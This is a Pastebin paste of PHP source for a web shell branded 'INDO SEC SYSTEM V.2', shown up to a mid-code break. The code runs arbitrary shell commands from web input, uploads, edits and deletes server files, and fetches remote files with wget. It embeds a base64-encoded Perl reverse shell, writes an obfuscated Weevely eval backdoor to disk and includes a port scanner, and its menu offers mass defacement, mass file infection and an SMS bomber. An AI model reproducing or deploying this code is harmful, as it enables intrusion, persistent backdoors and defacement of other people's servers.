daily pastebin goal
10%
SHARE
TWEET

Shell Priv7

a guest Apr 27th, 2018 429 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <LINK rel="SHORTCUT ICON" href="http://d11wbxl9l7koq0.cloudfront.net/ioi-outputs/ef76096adbb7fb197b7632a8a367737a-result.png">
  3. <body>
  4. <?php
  5.  
  6.  
  7.  $head = '
  8. <html>
  9. <head>
  10. </script>
  11. <title>INDO SEC SYSTEM V.2</title>
  12. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  13.  
  14. <STYLE>
  15. body {
  16.     background-image: url(https://s-i.huffpost.com/gen/4393678/images/o-THE-MATRIX-facebook.jpg);
  17.     background-repeat: repeat-x repeat-y;
  18.     background-position: left top;
  19.     font-size: 14px;
  20.     background-attachment: fixed;
  21. font-family: sans;
  22. color: red;
  23. margin:0px 0px 0px 0px;
  24. }
  25. font-family: Courier New
  26. }
  27. tr {
  28. BORDER: line 1px #333;
  29. color: #FFF;
  30. }
  31. td {
  32. BORDER: line 1px #333;
  33. color: #FFF;
  34. }
  35. .table1 {
  36. BORDER: 0px Black;
  37. BACKGROUND-COLOR: Black;
  38. color: #FFF;
  39. }
  40. .td1 {
  41. BORDER: 0px;
  42. BORDER-COLOR: #333333;
  43. font: 7pt Verdana;
  44. color: White;
  45. }
  46. .tr1 {
  47. BORDER: 0px;
  48. BORDER-COLOR: #333333;
  49. color: #FFF;
  50. }
  51. table {
  52. BORDER: line 1px #333;
  53. BORDER-COLOR: #333333;
  54. BACKGROUND-COLOR: Black;
  55. color: #FFF;
  56. }
  57. input {
  58. border          : line 1px;
  59. border-color        : #333;
  60. BACKGROUND-COLOR: #111111;
  61. font: 9pt Verdana;
  62. color: Red;
  63. }
  64. select {
  65. BORDER-RIGHT:  Black 1px solid;
  66. BORDER-TOP:    #DF0000 1px solid;
  67. BORDER-LEFT:   #DF0000 1px solid;
  68. BORDER-BOTTOM: Black 1px solid;
  69. BORDER-color: #FFF;
  70. BACKGROUND-COLOR: #111111;
  71. font: 8pt Verdana;
  72. color: Red;
  73. }
  74. submit {
  75. BORDER:  buttonhighlight 2px outset;
  76. BACKGROUND-COLOR: #111111;
  77. width: 30%;
  78. color: #FFF;
  79. }
  80. textarea {
  81. border          : line 1px #333;
  82. BACKGROUND-COLOR: #111111;
  83. font: Fixedsys bold;
  84. color: #999;
  85. }
  86. BODY {
  87.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  88. margin: 1px;
  89. color: Red;
  90. background-color: #111111;
  91. }
  92. .main {
  93. margin          : -287px 0px 0px -490px;
  94. BORDER: line 1px #333;
  95. BORDER-COLOR: #333333;
  96. }
  97. .tt {
  98. background-color: transparent;
  99. }
  100.  
  101. A:link {
  102.     COLOR: White; TEXT-DECORATION: none
  103. }
  104. A:visited {
  105.     COLOR: White; TEXT-DECORATION: none
  106. }
  107. A:hover {
  108.     color: Red; TEXT-DECORATION: none
  109. }
  110. A:active {
  111.     color: Red; TEXT-DECORATION: none
  112. }
  113. </STYLE>
  114. <script language=\'javascript\'>
  115. function hide_div(id)
  116. {
  117.   document.getElementById(id).style.display = \'none\';
  118.   document.cookie=id+\'=0;\';
  119. }
  120. function show_div(id)
  121. {
  122.   document.getElementById(id).style.display = \'block\';
  123.   document.cookie=id+\'=1;\';
  124. }
  125. function change_divst(id)
  126. {
  127.   if (document.getElementById(id).style.display == \'none\')
  128.     show_div(id);
  129.   else
  130.     hide_div(id);
  131. }
  132. </script>'; ?>
  133. <?php
  134. error_reporting(0);
  135. #chdir('');
  136. //Some basic var's
  137. if (!@$_GET['path']) {
  138.     $dir = CleanDir(getcwd());
  139. } else {
  140.     $dir = CleanDir($_GET['path']);
  141. }
  142. $rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
  143. $domain = $_SERVER['HTTP_HOST'];
  144. $script = $_SERVER['SCRIPT_NAME'];
  145. $full_url = $_SERVER['REQUEST_URI'];
  146. $script2 = basename($script);
  147. $serverip = $_SERVER['SERVER_ADDR'];
  148. $userip = $_SERVER['REMOTE_ADDR'];
  149. $whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
  150. $whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
  151. $disabled = ini_get('disable_functions');
  152. //Perl back connect script by LorD
  153. //Encoded in base64 for convenience
  154. $bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
  155. @ini_set("memory_limit", "9999M");
  156. @ini_set("max_execution_time", "0");
  157. @ini_set("upload_max_filesize", "9999m");
  158. @ini_set("magic_quotes_gpc", "0");
  159. @set_magic_quotes_runtime(0);
  160. set_time_limit(0);
  161. if (empty($disabled)) {
  162.     $disabled = "None";
  163. }
  164. //Some functions
  165. function CleanDir($directory) {
  166.     $directory = str_replace("\\", "/", $directory);
  167.     $directory = str_replace("//", "/", $directory);
  168.     return $directory;
  169. }
  170. function success($for, $var1) {
  171.     $domain = $_SERVER['HTTP_HOST'];
  172.     $script = $_SERVER['SCRIPT_NAME'];
  173.     $full_url = $_SERVER['REQUEST_URI'];
  174.     if ($for == "filesave") {
  175.         $message = "File Saved!";
  176.         $redirect = "http://$domain$script?path=$var1";
  177.     }
  178.     if ($for == "filedelete") {
  179.         $message = "File Deleted!";
  180.         $redirect = "http://$domain$script?path=$var1";
  181.     }
  182.     if ($for == "createdir") {
  183.         $message = "Directory Created!";
  184.         $redirect = "http://$domain$script?path=$var1";
  185.     }
  186.     if ($for == "dir_exists") {
  187.         $message = "Directory Already Exists!";
  188.         $redirect = "http://$domain$script?path=$var1";
  189.     }
  190.     if ($for == "file_exists") {
  191.         $message = "File Already Exists!";
  192.         $redirect = "http://$domain$script?editfile=$var1";
  193.     }
  194.     if ($for == "file_created") {
  195.         $message = "File Created!";
  196.         $redirect = "http://$domain$script?editfile=$var1";
  197.     }
  198.     if ($for == "file_uploaded") {
  199.         $message = "File Uploaded!";
  200.         $redirect = "http://$domain$full_url";
  201.     }
  202.     if ($for == "shell_killed") {
  203.         $message = "Shell Killed!";
  204.         $redirect = "http://$domain$script";
  205.     }
  206.     if ($for == "dir_del") {
  207.         $message = "Directory Deleted!";
  208.         $redirect = "http://$domain$script?path=$var1";
  209.     }
  210.     if ($for == "dir_renamed") {
  211.         $message = "Directory Renamed!";
  212.         $redirect = "http://$domain$script?path=$var1";
  213.     }
  214.     if ($for == "file_renamed") {
  215.         $message = "File Renamed!";
  216.         $redirect = "http://$domain$script?path=$var1";
  217.     }
  218.     if ($for == "configs_found") {
  219.         $message = "$var1 Configs Found!";
  220.         $redirect = "";
  221.     }
  222.     if ($for == "unzip") {
  223.         $message = "Successfully Unzipped File!";
  224.         $redirect = "http://$domain$script?path=$var1";
  225.     }
  226.     if ($for == "files_found") {
  227.         $message = "$var1 files found!";
  228.         $redirect = "";
  229.     }
  230.     if ($for == "weevely") {
  231.         $message = "Weevely BackDoor Installed!";
  232.         $redirect = "";
  233.     }
  234.     echo "<div id='xbox'><embed
  235.    src='http://p0wersurge.com/js/achievementnopic.swf'
  236.    width='300'
  237.    height='80'
  238.    flashvars='Text=$message&gs=1337'
  239.    wmode='transparent'/></div>";
  240.     if (empty($redirect)) {
  241.         echo "<script>
  242. function remove (){
  243.  document.getElementById('xbox').innerHTML='';
  244. }
  245. setInterval(function(){remove();}, 2700);
  246. </script>";
  247.     } else {
  248.         echo "<script>
  249. function remove (){
  250.  window.location = '$redirect'
  251. }
  252. setInterval(function(){remove();}, 2500);
  253. </script>";
  254.     }
  255. }
  256. function error($mesg) {
  257.     $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
  258.     echo "$error";
  259. }
  260. function ByteConversion($bytes, $precision = 2) {
  261.     $kilobyte = 1024;
  262.     $megabyte = $kilobyte * 1024;
  263.     $gigabyte = $megabyte * 1024;
  264.     $terabyte = $gigabyte * 1024;
  265.     if (($bytes >= 0) && ($bytes < $kilobyte)) {
  266.         return $bytes . ' B';
  267.     } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
  268.         return round($bytes / $kilobyte, $precision) . ' KB';
  269.     } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
  270.         return round($bytes / $megabyte, $precision) . ' MB';
  271.     } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
  272.         return round($bytes / $gigabyte, $precision) . ' GB';
  273.     } elseif ($bytes >= $terabyte) {
  274.         return round($bytes / $terabyte, $precision) . ' TB';
  275.     } else {
  276.         return $bytes . ' B';
  277.     }
  278. }
  279. //Mass File Function
  280. function files($mass_dir) {
  281.     if ($dh = opendir($mass_dir)) {
  282.         $files = array();
  283.         $inner_files = array();
  284.         while ($file = readdir($dh)) {
  285.             if ($file != "." && $file != ".." && $file[0] != '.') {
  286.                 if (is_dir($mass_dir . "/" . $file)) {
  287.                     $inner_files = files("$mass_dir/$file");
  288.                     if (is_array($inner_files)) $files = array_merge($files, $inner_files);
  289.                 } else {
  290.                     array_push($files, "$mass_dir/$file");
  291.                 }
  292.             }
  293.         }
  294.         closedir($dh);
  295.         return $files;
  296.     }
  297. }
  298. //Upload File
  299. if (isset($_POST['do_upload_file'])) {
  300.     $udir = $_POST['upload_location'];
  301.     $uname = $_FILES['upload_file']['name'];
  302.     $both = "$udir$uname";
  303.     if (file_exists($both)) {
  304.         success("file_exists", $both);
  305.     } else {
  306.         switch ($_FILES['upload_file']['error']) {
  307.             case 0:
  308.                 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
  309.                     success("file_uploaded");
  310.                 } else {
  311.                     error("Failed To Upload File!");
  312.                 }
  313.         }
  314.     }
  315. }
  316. //wget file
  317. if (isset($_POST['do_wget_file'])) {
  318.     $wget_file = $_POST['wget_file'];
  319.     $wecmd = "wget $wget_file";
  320.     $wget_ecmd = cmd2($wecmd, $dir);
  321.     echo "<center><font color='#14ab00'>
  322. Result:<br>
  323. <textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
  324. $wget_ecmd
  325. </textarea></font></center><br><br>";
  326. }
  327. //Execute command
  328. function cmd2($cmd, $path) {
  329.     chdir($path);
  330.     $disabled = ini_get('disable_functions');
  331.     if (empty($disabled)) {
  332.         $disabled = "None";
  333.     }
  334.     if ($disabled == "None") {
  335.         $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
  336.         while (!feof($io[1])) {
  337.             $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
  338.         }
  339.         while (!feof($io[2])) {
  340.             $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
  341.         }
  342.         fclose($io[1]);
  343.         fclose($io[2]);
  344.         proc_close($execute);
  345.         return $res;
  346.     } elseif (function_exists("proc_open")) {
  347.         $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
  348.         while (!feof($io[1])) {
  349.             $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
  350.         }
  351.         while (!feof($io[2])) {
  352.             $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
  353.         }
  354.         fclose($io[1]);
  355.         fclose($io[2]);
  356.         proc_close($execute);
  357.         return $res;
  358.     } elseif (function_exists("exec")) {
  359.         $res = exec($cmd);
  360.         return $res;
  361.     } elseif (function_exists("system")) {
  362.         $res = system($cmd);
  363.         return $res;
  364.     } elseif (function_exists("shell_exec")) {
  365.         $res = shell_exec($cmd);
  366.         return $res;
  367.     } elseif (function_exists("passthru")) {
  368.         $res = passthru($cmd);
  369.         return $res;
  370.     } else {
  371.         error("The necessary functions to execute commands are disabled!");
  372.     }
  373. }
  374. //Unzip function
  375. function unzip($filename, $directory) {
  376.     $zip = new ZipArchive;
  377.     $res = $zip->open($filename);
  378.     if ($res === TRUE) {
  379.         $zip->extractTo($directory);
  380.         $zip->close();
  381.         success("unzip", $directory);
  382.     } else {
  383.         cmd2("unzip $filename", $directory);
  384.     }
  385. }
  386. //Get files and directories and throw them into an array.
  387. $open = opendir($dir);
  388. $files = array();
  389. $direcs = array();
  390. while ($file = readdir($open)) {
  391.     if ($file != "." && $file != "..") {
  392.         if (is_dir("$dir/$file")) {
  393.             array_push($direcs, $file);
  394.         } else {
  395.             array_push($files, $file);
  396.         }
  397.     }
  398. }
  399. asort($direcs);
  400. asort($files);
  401. ?>
  402. <html>
  403. <head>
  404. <?php
  405.         echo $head ;
  406.         echo '
  407.  
  408. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  409.  
  410.            
  411.  
  412.  
  413.        <td width="100%" align=center valign="top" rowspan="1">
  414.            <font color=red size=8 face="Wallpoet"><b>Indonesian</font><font color=white size=8 face="Wallpoet"><b>  Security</font><font color=Blue size=8 face="Wallpoet"><b> System </font> <div class="hedr">
  415.  
  416.         <td height="10" align="left" class="td1"></td></tr><tr><td
  417.         width="100%" align="center" valign="top" rowspan="1"><font
  418.         color="red" face="comic sans ms"size="3"><b>
  419.         <font color=red>
  420.        
  421.        
  422.        
  423.         [+] IndonesianSecuritySystem [+]
  424.                        
  425.            </table>
  426.            
  427.        
  428.  
  429. ';
  430.  
  431. ?>
  432. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>Second Generation of KuncenCyberTeam Shell</font><br></td></tr></table>
  433. </head>
  434. <p></p>
  435. <p></p>
  436. <body bgcolor="black"><body bgcolor="black">
  437. <table border=1 width=100%><td width=15% align=right><font color=red size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname()  ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
  438. </table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
  439. </table>
  440. <center><div id="menu">
  441. <a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=white> [Home] </font></a>
  442. <a href="<?php echo '?perlbackconnect';?>"><font size=4 face="Wallpoet" color=red> [Perl Back Connect] </font></a>
  443. <a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=white> [Python Back connect] </font></a>
  444. <a href="<?php echo '?encrypt';?>"><font size=4 face="Wallpoet" color=red> [Encrypt] </font></a>
  445. <a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=white> [Mass Deface] </font></a>
  446. <a href="<?php echo '?massinfect';?>"><font size=4 face="Wallpoet" color=red> [Mass File Infect] </font></a>
  447. <a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=white> [Install MSD] </font></a>
  448. <p></p>
  449. <a href="<?php echo '?sms';?>"><font size=4 face="Wallpoet" color=red> [SMS Bomber] </font></a>
  450. <a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=white> [Reverse IP] </font></a>
  451. <a href="<?php echo '?weev';?>"><font size=4 face="Wallpoet" color=red> [Weevely Backdoor] </font></a>
  452. <a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=white> [Port Scan] </font></a>
  453. </div></center>
  454. <p></p>
  455. <p></p>
  456. <p></p>
  457. <?php
  458. if (isset($_GET['encrypt'])) {
  459.     echo "<form action='' method='post'>
  460. <center><font color='#14ab00'>
  461. <input type='text' name='en_string' class='text'>
  462. <input type='submit' name='do_encrypt' value='Encrypt String'>
  463. </form>
  464. </font></center>";
  465. }
  466. if (isset($_POST['do_encrypt'])) {
  467.     $vbsalt = gen_salt("30");
  468.     $vbsalt2 = gen_salt("3");
  469.     $mybbsalt = gen_salt("8");
  470.     $ipbsalt = gen_salt("5");
  471.     $joomlasalt = gen_salt("32");
  472.     $password = $_POST['en_string'];
  473.     $md5 = md5($password);
  474.     $md52 = md5(md5($password));
  475.     $md53 = md5(md5(md5($password)));
  476.     $sha1 = sha1($password);
  477.     $sha256 = hash('sha256', $password);
  478.     $vbalg = md5(md5($password) . $vbsalt);
  479.     $vbalg2 = md5(md5($password) . $vbsalt2);
  480.     $mybbalg = md5(md5($mybbsalt) . $password);
  481.     $ipbalg = md5(md5($ipbsalt) . md5($password));
  482.     $joomlaalg = md5($password . $joomlasalt);
  483.     $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
  484.     echo "<center>
  485. <textarea rows='20' cols='150' style='color:#00ff00'>
  486. $en_result
  487. </textarea>
  488. </center><br>";
  489. }
  490. ?>
  491. <?php
  492. //Port scan
  493. if (isset($_GET['scan'])) {
  494.     echo "<center><font color='#14ab00' size='3'>
  495. Port Scan:<br>
  496. <form action='' method='post'>
  497. Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
  498. Start port: <input type='text' name='start_port' class='text' size='6'>
  499. End port: <input type='text' name='end_port' class='text' size='7'><br>
  500. <input type='submit' name='start_scan' value='Scan'>
  501. </form>
  502. </font>
  503. </center>";
  504. }
  505. if (isset($_POST['start_scan'])) {
  506.     $scanhost = $_POST['scan_host'];
  507.     $startport = $_POST['start_port'];
  508.     $endport = $_POST['end_port'];
  509.     while ($startport <= $endport) {
  510.         if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
  511.             echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
  512.         } else {
  513.             echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
  514.         }
  515.         $startport++;
  516.     }
  517. }
  518. ?>
  519. <?php
  520. //Edit file stuff
  521. if (!empty($_GET['editfile'])) {
  522.     $edfile = $_GET['editfile'];
  523.     $redirectloc = dirname($edfile);
  524.     echo "<form method='POST'><center>";
  525.     if (file_exists($edfile)) {
  526.         if (get_magic_quotes_gpc()) {
  527.             $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
  528.         } else {
  529.             $file_content = htmlspecialchars(file_get_contents($edfile));
  530.         }
  531.         if (is_writeable($edfile)) {
  532.             echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
  533. <br><br>
  534.         <input type='submit' name='savedit' value='Save' />
  535.         <input type='submit' name='deletefile' value='Delete' />
  536.         </form></center>";
  537.             if (isset($_POST['savedit'])) {
  538.                 if (get_magic_quotes_gpc()) {
  539.                     $edfilecontent = stripslashes($_POST['edfile_contents']);
  540.                 } else {
  541.                     $edfilecontent = $_POST['edfile_contents'];
  542.                 }
  543.                 if (file_put_contents($edfile, $edfilecontent)) {
  544.                     success("filesave", rtrim($redirectloc, "/"));
  545.                 } else {
  546.                     error("Failed to save file!");
  547.                 }
  548.             } else if (isset($_POST['deletefile'])) {
  549.                 if (unlink($edfile)) {
  550.                     success("filedelete", rtrim($redirectloc, '/'));
  551.                 } else {
  552.                     error("Failed to delete file!");
  553.                 }
  554.             }
  555.         } else {
  556.             echo "<font color='red'><b>File is read only!</b></font><br>
  557. <textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
  558.         }
  559.         echo "</center>";
  560.     } else {
  561.         echo "<form method='POST'><center>";
  562.         echo "<font color='red'><b>File does not exist!</b></font><br>
  563. <textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
  564. </textarea><br><br>
  565.  <input type='submit' name='savefile' value='Create File' /><br /><br />
  566.         </form></center>";
  567.         if (isset($_POST['savefile'])) {
  568.             if (get_magic_quotes_gpc()) {
  569.                 $newfilecontent = stripslashes($_POST['newfile_contents']);
  570.             } else {
  571.                 $newfilecontent = $_POST['newfile_contents'];
  572.             }
  573.             if (file_put_contents($edfile, $newfilecontent)) {
  574.                 success("filesave", rtrim($redirectloc, "/"));
  575.             } else {
  576.                 error("Failed to save file!");
  577.             }
  578.         }
  579.     }
  580. }
  581. ?>
  582. <?php
  583. //Weevely backdoor
  584. if (isset($_GET['weev'])) {
  585.     echo "<center><font color='#14ab00' size='3'>
  586. <form action='' method='post'>
  587. Directory to install weevely backdoor:<br>
  588. <input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
  589. Name of file (something .php):<br>
  590. <input type='text' name='weev_name' class='text' value='weevely.php'><br>
  591. Password (more than 3 characters):<br>
  592. <input type='text' name='weev_pass' class='text'><br>
  593. <input type='submit' name='install_weev' value='BackDoor'><br>
  594. </font>
  595. </center>";
  596. }
  597. if (isset($_POST['install_weev'])) {
  598.     $weevdir = rtrim($_POST['weev_dir'], '/');;
  599.     $weevname = $_POST['weev_name'];
  600.     $weevpassword = $_POST['weev_pass'];
  601.     if (strlen($weevpassword) < 3) {
  602.         error("Password must be longer than 3 characters!");
  603.     } else {
  604.         $first2 = $weevpassword[0] . $weevpassword[1];
  605.         $rest = substr($weevpassword, 2);
  606.         $money = "$";
  607.         $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
  608.         $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
  609.         $weevelybd3 = "$money" . "k='$rest';";
  610.         $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
  611.         $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
  612.         if (file_put_contents($weevdir . '/' . $weevname, $all)) {
  613.             echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
  614.             success("weevely");
  615.         } else {
  616.             error("Failed to write backdoor to $weevdir");
  617.         }
  618.     }
  619. }
  620. ?>
  621. <?php
  622. //Domain information
  623. //Get domains hosted on server from yougetsignal.com
  624. if (isset($_GET['domaininfo'])) {
  625.     echo "<font color='#14ab00' size='3'>";
  626.     $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
  627.     $num = 0;
  628.     $count = sizeof($dns_record);
  629.     echo "<br></b><br>";
  630.     while ($num < $count) {
  631.         $name_servers = $dns_record[$num];
  632.         $name_servers2 = $name_servers['type'];
  633.         $name_servers3 = @$name_servers['target'];
  634.         $num++;
  635.         if ($name_servers2 == "NS") {
  636.             echo "$name_servers3<br>";
  637.             $nshost = @$name_servers['host'];
  638.         }
  639.         if ($name_servers2 == "SOA") {
  640.             $nsemail = $name_servers['rname'];
  641.         }
  642.         if ($name_servers2 == "A") {
  643.             $nsip = $name_servers['ip'];
  644.         }
  645.     }
  646.     $num = 0;
  647.     echo "<br><table class='noborder'>
  648. </table><br>";
  649.     $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
  650.     $status = $domains_on_server->status;
  651.     $message = $domains_on_server->message;
  652.     $domainAr = $domains_on_server->domainArray;
  653.     $num_of_site = $domains_on_server->domainCount;
  654.     $count = sizeof($domainAr);
  655.     if ($status == "Success") {
  656.         echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
  657.         while ($num < $count) {
  658.             $hossites = $domainAr[$num];
  659.             $num++;
  660.             $hossites3 = $domainAr[$num];
  661.             $hossites3 = $hossites3[0];
  662.             $hossites = $hossites[0];
  663.             $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
  664.             $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
